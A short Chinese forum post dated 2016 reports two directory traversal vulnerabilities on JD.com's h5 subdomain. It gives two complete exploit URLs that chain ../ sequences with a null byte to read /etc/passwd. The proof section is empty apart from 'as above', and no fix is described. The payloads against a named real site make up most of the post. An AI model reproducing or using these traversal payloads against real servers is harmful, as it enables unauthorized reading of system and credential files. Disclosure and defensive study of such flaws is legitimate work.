HanDs
管理员

[7月漏洞公开] 京东商城两处任意目录遍历下载漏洞 



rt

详细说明:

京东商城两处目录遍历漏洞,可读取etc/passwd文件。

code 区域
http://h5.jd.com/misc/script/common/?js=../../../../../../../../../../../../../sbin/../etc/././passwd%00f.js

code 区域
http://h5.jd.com/misc/script/?js=../../../../../../../../../../../../../sbin/../etc/././passwd%00f.js

jd1.jpg

jd2.jpg

漏洞证明:

如上

修复方案:


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
京东 商城 任意 目录 下载 漏洞
#1楼
发帖时间:2016-7-14   |   查看数:0   |   回复数:0
游客组
快速回复